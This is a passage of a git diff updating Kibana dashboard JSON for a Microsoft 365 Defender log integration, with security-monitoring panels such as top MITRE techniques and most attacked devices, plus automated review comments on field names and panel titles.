"m365_defender.incident.alert.evidence.roles": "compromised" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "108199c0-a675-4fe1-87a9-4599aa85db91", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "7048d5d3-a8bc-4b71-8b79-e51c6adc0350", + "isTransposed": false + }, + { + "columnId": "471be050-ea96-4ce7-8cef-00ca90e6fbed", + "isTransposed": false + } + ], + "layerId": "bf6ca0e6-4c26-4cff-b35c-a1a578a38d20", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a6c60337-0230-4d71-90d6-fcbf09ca19bb", + "w": 24, + "x": 0, + "y": 150 + }, + "panelIndex": "a6c60337-0230-4d71-90d6-fcbf09ca19bb", + "title": "Top 10 User Account with Compromised Role [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5b675bca-2096-430a-ac1e-6a435a5c3e34", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5b675bca-2096-430a-ac1e-6a435a5c3e34": { + "columnOrder": [ + "d04bf6a5-66f9-4899-a4d1-e2c4ec7d4b74", + "f37bb823-c831-497e-8d7e-8c00acbc11ff" + ], + "columns": { + "d04bf6a5-66f9-4899-a4d1-e2c4ec7d4b74": { + "customLabel": true, + "dataType": "string", + 
"isBucketed": true, + "label": "Mitre Technique", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f37bb823-c831-497e-8d7e-8c00acbc11ff", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.technique.subtechnique.id" + }, + "f37bb823-c831-497e-8d7e-8c00acbc11ff": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "f37bb823-c831-497e-8d7e-8c00acbc11ff", + "isTransposed": false + }, + { + "columnId": "d04bf6a5-66f9-4899-a4d1-e2c4ec7d4b74", + "isTransposed": false + } + ], + "layerId": "5b675bca-2096-430a-ac1e-6a435a5c3e34", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d", + "w": 24, + "x": 24, + "y": 150 + }, + "panelIndex": 
"d7865055-20d9-4c1f-a0c2-4ddcd73a849d", + "title": "Top Mitre Techniques [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6e6323ee-5d54-4720-85b5-f567b8ef9d21", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dd37b426-93bd-4376-8f4d-831cfa0673d8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6e6323ee-5d54-4720-85b5-f567b8ef9d21": { + "columnOrder": [ + "0f49f90e-0cbc-4ae0-b24d-0c82dc7c9d3b", + "5dea6d18-051a-4715-9327-3d30bb020a87" + ], + "columns": { + "0f49f90e-0cbc-4ae0-b24d-0c82dc7c9d3b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Device ID", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "5dea6d18-051a-4715-9327-3d30bb020a87", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.id" + }, + "5dea6d18-051a-4715-9327-3d30bb020a87": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "dd37b426-93bd-4376-8f4d-831cfa0673d8", + "key": "m365_defender.incident.alert.evidence.roles", + "negate": false, + "params": { + "query": "attacked" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "m365_defender.incident.alert.evidence.roles": "attacked" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + 
"alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "0f49f90e-0cbc-4ae0-b24d-0c82dc7c9d3b", + "isTransposed": false + }, + { + "columnId": "5dea6d18-051a-4715-9327-3d30bb020a87", + "isTransposed": false + } + ], + "layerId": "6e6323ee-5d54-4720-85b5-f567b8ef9d21", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "57c437df-b2a8-40de-b8c5-26fadf2b3140", + "w": 24, + "x": 0, + "y": 165 + }, + "panelIndex": "57c437df-b2a8-40de-b8c5-26fadf2b3140", + "title": "Top 10 Most Attacked Device [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-3f509783-a68e-46a5-a9ea-6c51a0bcf036", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "eaea7ed4-6b0d-4522-8e92-34b831024614", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "3f509783-a68e-46a5-a9ea-6c51a0bcf036": { + "columnOrder": [ + "3f1e354e-7c22-434e-9a0d-22e8b81f63b5", + "82a086d9-d047-4bc2-a791-c13d1f056f9c" + ], + "columns": { + "3f1e354e-7c22-434e-9a0d-22e8b81f63b5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process 
Commands", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "82a086d9-d047-4bc2-a791-c13d1f056f9c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.command_line" + }, + "82a086d9-d047-4bc2-a791-c13d1f056f9c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "m365_defender.incident.alert.id" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "eaea7ed4-6b0d-4522-8e92-34b831024614", + "key": "m365_defender.incident.alert.evidence.verdict", + "negate": false, + "params": [ + "malicious", + "suspicious" + ], + "type": "phrases", + "value": [ + "malicious", + "suspicious" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "malicious" + } + }, + { + "match_phrase": { + "m365_defender.incident.alert.evidence.verdict": "suspicious" + } + } + ] + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "m365_defender.incident" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "m365_defender.incident" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "3f1e354e-7c22-434e-9a0d-22e8b81f63b5", + "isTransposed": false + }, + { + "columnId": "82a086d9-d047-4bc2-a791-c13d1f056f9c", + "isTransposed": false + } + ], + "layerId": "3f509783-a68e-46a5-a9ea-6c51a0bcf036", + 
"layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1 + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "6093d81b-dac2-417b-98cb-5531284af94f", + "w": 24, + "x": 24, + "y": 165 + }, + "panelIndex": "6093d81b-dac2-417b-98cb-5531284af94f", + "title": "Top 10 Process Commands with Suspicious or Malicious Verdict [Logs Microsoft 365 Defender]", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 17, + "i": "b4755871-88ae-45f2-813c-dbe4ca1cc54b", + "w": 48, + "x": 0, + "y": 180 + }, + "panelIndex": "b4755871-88ae-45f2-813c-dbe4ca1cc54b", + "panelRefName": "panel_b4755871-88ae-45f2-813c-dbe4ca1cc54b", + "type": "search", + "version": "8.7.1" + } + ], + "timeRestore": false, + "title": "[Logs Microsoft 365 Defender] Incident", + "version": 1 + }, + "coreMigrationVersion": "8.7.1", + "created_at": "2024-01-22T11:50:13.514Z", + "id": "m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06", + "migrationVersion": { + "dashboard": "8.7.0" + }, + "references": [ + { + "id": "logs-*", + "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:indexpattern-datasource-layer-961a470c-6271-4d2f-b553-646b67834136", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0bc0ee87-64be-46bf-89ac-3a3c17f3ab7e:22e1bd27-885c-4745-b12d-9381e438538f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b49a572-a243-4c87-bea9-d0531d9dbd5a:indexpattern-datasource-layer-6ddc53cd-2bbd-4616-837b-3fbe0712ca7e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b49a572-a243-4c87-bea9-d0531d9dbd5a:4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09a42be0-f530-4662-a284-5ad7d3264935:indexpattern-datasource-layer-19999c0c-be9d-43ba-994a-72fadb61fabc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"09a42be0-f530-4662-a284-5ad7d3264935:c2e6011b-e248-4de4-8701-18029063d0ce", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:indexpattern-datasource-layer-f41e1d1a-0dc1-4416-b48b-a04c4e59d46c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b2cc378e-bce4-4769-9778-2f7f4fcb0f9b:20ea0ba5-f3a2-45a8-8af1-00ccb757801f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:indexpattern-datasource-layer-a3705125-6c5c-43a6-a594-6d384c293ec9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e8dcdb05-dc55-4c3d-ba79-d043d3987e53:a77281bd-3237-4d8d-b908-18a4a562b070", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:indexpattern-datasource-layer-7f55a9ab-9515-4d17-844d-c925b2ccdbd1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ae3a1a20-4ff4-4e3d-9bbc-ccb240662789:644633f8-cafb-4bfd-8a03-4a1e7c1146e7", + "type": "index-pattern" + }, + { + "id": "m365_defender-fcf25960-44af-11ed-8375-0168a9970c06", + "name": "b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0:panel_b3cf43f7-84a7-4d89-b9ca-8bbac00f67a0", + "type": "search" + }, + { + "id": "logs-*", + "name": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2:indexpattern-datasource-layer-2fa8c035-1708-4d32-88fc-b59af7751db4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a567157d-8f3c-4fa5-b7a1-1caa3f9252b2:d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc:indexpattern-datasource-layer-874da7c4-ebe5-4c5c-a302-094d287b81bb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "039e6ffc-d9bb-4bfb-9fde-a7dc9a7938bc:2128586b-14fe-4907-84a9-4c193f8a2c5f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7f825e05-faee-4ad4-9898-69cb1204cf89:indexpattern-datasource-layer-bdba4af5-1396-46ec-ad04-59157e7697f9", + "type": 
"index-pattern" + }, + { + "id": "logs-*", + "name": "7f825e05-faee-4ad4-9898-69cb1204cf89:a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0:indexpattern-datasource-layer-45d80486-c9c8-4d28-bbcd-5d29072c9cb9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8b6e0921-d74d-4fc1-83f4-04b15f37bef0:57b64179-81e7-4d61-b50b-23d21323b9da", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2c9ca03f-7301-4749-9825-4b7871d90b21:indexpattern-datasource-layer-24cc5824-23e2-462f-b38f-4769ea95322a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2c9ca03f-7301-4749-9825-4b7871d90b21:7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1a124e55-d897-4528-ad07-033d238e7460:indexpattern-datasource-layer-a0e68595-3ccc-4ff9-90fb-8087bc439020", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1a124e55-d897-4528-ad07-033d238e7460:742836c8-3532-4e18-b067-26e3af1b0e3b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1a124e55-d897-4528-ad07-033d238e7460:438f3787-c321-45a5-9cca-89571591b016", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80ad6adc-885a-471b-b9f1-ca6742177339:indexpattern-datasource-layer-32a410b6-1ed8-4397-ab2e-151edec25e80", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "80ad6adc-885a-471b-b9f1-ca6742177339:dbc8860d-394c-46cb-a626-67a20c1862c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e81b4ea3-793d-4827-a77a-df2c9bf006d5:indexpattern-datasource-layer-d2d7332c-5fbd-4acc-bef9-a1f2a2a6a25d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e81b4ea3-793d-4827-a77a-df2c9bf006d5:be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a6c60337-0230-4d71-90d6-fcbf09ca19bb:indexpattern-datasource-layer-bf6ca0e6-4c26-4cff-b35c-a1a578a38d20", + "type": 
"index-pattern" + }, + { + "id": "logs-*", + "name": "a6c60337-0230-4d71-90d6-fcbf09ca19bb:bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a6c60337-0230-4d71-90d6-fcbf09ca19bb:108199c0-a675-4fe1-87a9-4599aa85db91", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d:indexpattern-datasource-layer-5b675bca-2096-430a-ac1e-6a435a5c3e34", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d7865055-20d9-4c1f-a0c2-4ddcd73a849d:75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57c437df-b2a8-40de-b8c5-26fadf2b3140:indexpattern-datasource-layer-6e6323ee-5d54-4720-85b5-f567b8ef9d21", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57c437df-b2a8-40de-b8c5-26fadf2b3140:dd37b426-93bd-4376-8f4d-831cfa0673d8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57c437df-b2a8-40de-b8c5-26fadf2b3140:5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6093d81b-dac2-417b-98cb-5531284af94f:indexpattern-datasource-layer-3f509783-a68e-46a5-a9ea-6c51a0bcf036", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6093d81b-dac2-417b-98cb-5531284af94f:eaea7ed4-6b0d-4522-8e92-34b831024614", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6093d81b-dac2-417b-98cb-5531284af94f:8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "type": "index-pattern" + }, + { + "id": "m365_defender-989afc60-44a5-11ed-8375-0168a9970c06", + "name": "b4755871-88ae-45f2-813c-dbe4ca1cc54b:panel_b4755871-88ae-45f2-813c-dbe4ca1cc54b", "type": "search" }, { "id": "logs-*", - "name": "controlGroup_72c489e6-c07a-4c74-8c35-d70b4b4e8ccd:optionsListDataView", + "name": "controlGroup_72c489e6-c07a-4c74-8c35-d70b4b4e8ccd:rangeSliderDataView", "type": "index-pattern" }, { 
diff --git a/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json b/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json index 6e3c80aa2ed..adc25858a52 100644 --- a/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json +++ b/packages/m365_defender/kibana/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03.json 
@@ -4,7 +4,7 @@ "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\",\"fieldName\":\"event.provider\",\"title\":\"Service Source\",\"enhancements\":{}}},\"e61071e0-ba4d-4765-9267-e035395b221f\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"e61071e0-ba4d-4765-9267-e035395b221f\",\"fieldName\":\"m365_defender.incident.alert.severity\",\"title\":\"Severity\",\"selectedOptions\":[],\"enhancements\":{}}},\"ec5d23b5-535c-483a-88ad-279762f3d5ca\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ec5d23b5-535c-483a-88ad-279762f3d5ca\",\"fieldName\":\"m365_defender.incident.alert.detection_source\",\"title\":\"Detection Source\",\"enhancements\":{}}},\"cef3df17-225a-4373-a231-caa594cd1bf4\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"cef3df17-225a-4373-a231-caa594cd1bf4\",\"fieldName\":\"m365_defender.incident.alert.evidence.roles\",\"title\":\"Evidence Role\",\"enhancements\":{}}}}" + "panelsJSON": "{\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5779a7c6-acf5-4f7d-ac4c-caae9517d95e\",\"fieldName\":\"event.provider\",\"title\":\"Service Source\",\"enhancements\":{}}},\"ec5d23b5-535c-483a-88ad-279762f3d5ca\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"ec5d23b5-535c-483a-88ad-279762f3d5ca\",\"fieldName\":\"m365_defender.alert.detection_source\",\"title\":\"Detection 
Source\",\"enhancements\":{},\"selectedOptions\":[]}},\"cef3df17-225a-4373-a231-caa594cd1bf4\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"cef3df17-225a-4373-a231-caa594cd1bf4\",\"fieldName\":\"m365_defender.alert.evidence.roles\",\"title\":\"Evidence Role\",\"enhancements\":{},\"selectedOptions\":[]}},\"23cace2f-34ed-4efa-bed4-ccdc7318dfb8\":{\"type\":\"rangeSliderControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"23cace2f-34ed-4efa-bed4-ccdc7318dfb8\",\"fieldName\":\"event.severity\",\"title\":\"event.severity\",\"enhancements\":{}}}}" }, "description": "Overview of Microsoft 365 Defender Alerts", "kibanaSavedObjectMeta": { 
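Review bot: The new range-slider control is titled with the raw field name, `\"title\":\"event.severity\"`, while the sibling controls in the same `panelsJSON` carry human-readable titles such as `\"title\":\"Detection Source\"`; `\"title\":\"Severity\"` would match them and keep the label of the options-list control this replaces. The reference entry for this control group presumably needs the matching update as well (the other dashboard in this diff switched its `controlGroup_…:optionsListDataView` reference to `rangeSliderDataView`), but that change is not visible in this chunk for this file, so confirm it is present in its `references` array.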
@@ -43,7 +43,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device Events](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity Events](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email Events](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Incident Datastream (Graph API) \n\n[Incident Events](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06) \n**[Alert Events](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03)** \n\n#### Description\n\nThis dashboard visualizes Alert type events collected from the MS Graph API using the Incident Datastream\n\n", + "markdown": "### Navigation\n\n#### M365 Defender\n\n#### EventHub Datastream \n[Alert Events](#/dashboard/m365_defender-2690a440-7235-11ed-8657-c59f6ece834c) \n[Device](#/dashboard/m365_defender-c0b796d0-720a-11ed-8657-c59f6ece834c) \n[App \u0026 Identity](#/dashboard/m365_defender-d587df00-745f-11ed-8657-c59f6ece834c) \n[Email](#/dashboard/m365_defender-3caf3c00-7456-11ed-8657-c59f6ece834c) \n\n#### Graph API Datastream\n[Incident](#/dashboard/m365_defender-ac54d310-44ab-11ed-8375-0168a9970c06) \n**[Alert](#/dashboard/m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03)** \n\n#### Description\n\nThis dashboard showcases various alert metrics, including counts for new, in-progress, resolved, assigned, and unassigned alerts. It categorizes alerts by severity, category, determination, and service source. The display features top 10 email sender IPs with suspicious or malicious verdicts, leading detection sources, a timeline of alerts, a table highlighting top MITRE techniques, the top 10 compromised user accounts, the most attacked devices, and concludes with essential details of the alerts.\n\n", "openLinksInNewTab": false }, "title": "", 
@@ -52,7 +52,7 @@ } }, "gridData": { - "h": 134, + "h": 129, "i": "5852497b-14e8-4c1e-a9ab-fc387a3ae672", "w": 8, "x": 0, @@ -74,7 +74,7 @@ }, { "id": "logs-*", - "name": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "name": "9f120d0d-531c-42be-b1ed-5dc4683d5b15", "type": "index-pattern" } ], @@ -86,9 +86,7 @@ "6ddc53cd-2bbd-4616-837b-3fbe0712ca7e": { "columnOrder": [ "330da6b3-a0e3-41b9-8103-69b3381f1788", - "6400adfe-4702-4f13-923f-f94d87aa0ced", - "6400adfe-4702-4f13-923f-f94d87aa0cedX0", - "6400adfe-4702-4f13-923f-f94d87aa0cedX1" + "6400adfe-4702-4f13-923f-f94d87aa0ced" ], "columns": { "330da6b3-a0e3-41b9-8103-69b3381f1788": { @@ -108,37 +106,37 @@ { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.status : \"new\" " + "query": "source.user.name : *" }, - "label": "New Alerts" + "label": "Assigned Alerts" }, { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.status : \"inProgress\" " + "query": "not (source.user.name : *)" }, - "label": "In Progress Alerts" + "label": "Unassigned Alerts" }, { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.status : \"resolved\" " + "query": "m365_defender.alert.status : \"new\" " }, - "label": "Resolved Alerts" + "label": "New Alerts" }, { "input": { "language": "kuery", - "query": "m365_defender.incident.alert.severity : \"high\"" + "query": "m365_defender.alert.status : \"inProgress\" " }, - "label": "High Severity Alerts" + "label": "In Progress Alerts" }, { "input": { "language": "kuery", - "query": "not (m365_defender.incident.alert.assigned_to : * )" + "query": "m365_defender.alert.status : \"resolved\" " }, - "label": "Unassigned Alerts" + "label": "Resolved Alerts" } ] }, 
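Review bot: The `Assigned Alerts`/`Unassigned Alerts` filters now key on `source.user.name : *`, a field that in ECS denotes the user on the source side of an event rather than an analyst assignment; if the alert data stream also populates it from other alert content, the assigned/unassigned split will be skewed. The incident-based version of this panel filtered on a dedicated assignment field (`m365_defender.incident.alert.assigned_to`); if the alert data stream keeps an equivalent field, filtering on it is unambiguous, otherwise the mapping of the assignee into `source.user.name` deserves a line in the package docs. As a minor style point, the three status queries keep a trailing space inside the string (`\"new\" `), harmless to KQL but inconsistent with the two new ones.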
@@ -149,53 +147,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "formula", - "params": { - "formula": "defaults(unique_count(m365_defender.incident.alert.id), 0)", - "isFormulaBroken": false - }, - "references": [ - "6400adfe-4702-4f13-923f-f94d87aa0cedX1" - ], - "scale": "ratio" - }, - "6400adfe-4702-4f13-923f-f94d87aa0cedX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Count", - "operationType": "unique_count", + "operationType": "count", "params": { "emptyAsNull": false }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" - }, - "6400adfe-4702-4f13-923f-f94d87aa0cedX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Count", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "6400adfe-4702-4f13-923f-f94d87aa0cedX0", - 0 - ], - "location": { - "max": 58, - "min": 0 - }, - "name": "defaults", - "text": "defaults(unique_count(m365_defender.incident.alert.id), 0)", - "type": "function" - } - }, - "references": [ - "6400adfe-4702-4f13-923f-f94d87aa0cedX0" - ], - "scale": "ratio" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -215,17 +172,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "index": "9f120d0d-531c-42be-b1ed-5dc4683d5b15", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -273,7 +230,7 @@ }, { "id": "logs-*", - "name": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "name": "a155689d-f319-4f42-831d-2097922e6b7c", "type": "index-pattern" } ], 
